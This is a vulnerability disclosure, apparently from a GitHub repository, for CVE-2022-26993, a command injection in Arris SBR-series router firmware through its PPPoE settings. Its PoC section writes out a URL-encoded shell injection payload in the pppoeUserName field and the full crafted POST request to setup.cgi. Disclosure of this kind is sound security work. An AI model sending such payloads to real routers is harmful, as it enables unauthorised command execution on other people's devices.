Headline
CVE-2022-26993: my_vuln/4.md at main · wudipjq/my_vuln
Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pppoe function via the pppoeUserName, pppoePassword, and pppoe_Service parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.
ARRIS Vulnerability
Vendor:ARRIS
Product:SBR-AC1900P、SBR-AC3200P、SBR-AC1200P
Version:1.0.7-B05(Download Link:https://arris.secure.force.com/consumers/ConsumerProductDetail?p=a0ha000000REKViAAP&c=SURFboard%20Routers#panel4)
1.0.7-B05(Download Link:https://arris.secure.force.com/consumers/ConsumerProductDetail?p=a0ha000000OlajgAAB&c=SURFboard%20Routers#panel4)
1.0.5-B05(Download Link:https://arris.secure.force.com/consumers/ConsumerProductDetail?p=a0ha000000RpnMpAAJ&c=SURFboard%20Routers#panel4)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in ARRIS router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In setup.cgi
binary:
In the router’s pppoe
function, pppoeUserName、pppoePassword、pppoe_Service
is directly passed by the attacker, so we can control the pppoeUserName、pppoePassword、pppoe_Service
to attack the OS.
As you can see here, the input has not been checked.And then,call the function scnvram_set
to store this input.
In rc
binary:
As you can see here, in sub_36D64
function, the initial input has not checked and cause command injection.
Supplement
In order to avoid such problems, we believe that the string content should be checked in the input extraction part.
Complete vulnerability verification on SBR-AC1900P product
PoC
We set pppoeUserName
as %27%3Bcd+%2Fproc%3B%2Fusr%2Fsbin%2Fls%3E%2Ftmp%2Fwww%2Fhack3.txt%3B%27 , The meaning of this command is ‘;cd /proc;/usr/sbin/ls>/tmp/www/hack3.txt;’,and the router will excute it,such as:
POST /setup.cgi?id=5aac3e8a HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1317 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/RgSetup.htm Cookie: RebootType=1; 80211Radio_backup=0; 80211Radio=0; PrimaryRadio_backup=0; PrimaryRadio=0 Upgrade-Insecure-Requests: 1
wan_connection_type=2&getdnsautomatially_from_ISP=1&StaticWanIpAddressIP0=&StaticWanIpAddressIP1=&StaticWanIpAddressIP2=&StaticWanIpAddressIP3=&StaticWanIpMaskIP0=&StaticWanIpMaskIP1=&StaticWanIpMaskIP2=&StaticWanIpMaskIP3=&GatewayIpAddressIP0=&GatewayIpAddressIP1=&GatewayIpAddressIP2=&GatewayIpAddressIP3=&pppoeUserName=%27%3Bcd+%2Fproc%3B%2Fusr%2Fsbin%2Fls%3E%2Ftmp%2Fwww%2Fhack3.txt%3B%27&pppoePassword=abc123&pppoe_Service=pjqwudi&pppMtuSize=1492&pptpWanIpAddressIP0=&pptpWanIpAddressIP1=&pptpWanIpAddressIP2=&pptpWanIpAddressIP3=&pptpWanIpMaskIP0=&pptpWanIpMaskIP1=&pptpWanIpMaskIP2=&pptpWanIpMaskIP3=&pptpGatewayIpAddressIP0=&pptpGatewayIpAddressIP1=&pptpGatewayIpAddressIP2=&pptpGatewayIpAddressIP3=&l2tpWanIpAddressIP0=&l2tpWanIpAddressIP1=&l2tpWanIpAddressIP2=&l2tpWanIpAddressIP3=&l2tpWanIpMaskIP0=&l2tpWanIpMaskIP1=&l2tpWanIpMaskIP2=&l2tpWanIpMaskIP3=&l2tpGatewayIpAddressIP0=&l2tpGatewayIpAddressIP1=&l2tpGatewayIpAddressIP2=&l2tpGatewayIpAddressIP3=&pptpUserName=&pptpPassword=&pptp_Server=&pptpMtuSize=1436&l2tpUserName=&l2tpPassword=&L2tpServer=&l2tpMtuSize=1452&MtuSize=1500&SpoofedMacAddressMA0=BC&SpoofedMacAddressMA1=64&SpoofedMacAddressMA2=4B&SpoofedMacAddressMA3=A7&SpoofedMacAddressMA4=DF&SpoofedMacAddressMA5=51&ApplyRgSetupAction=1&WanLeaseAction=0&this_file=RgSetup.htm&next_file=RgSetup.htm
Result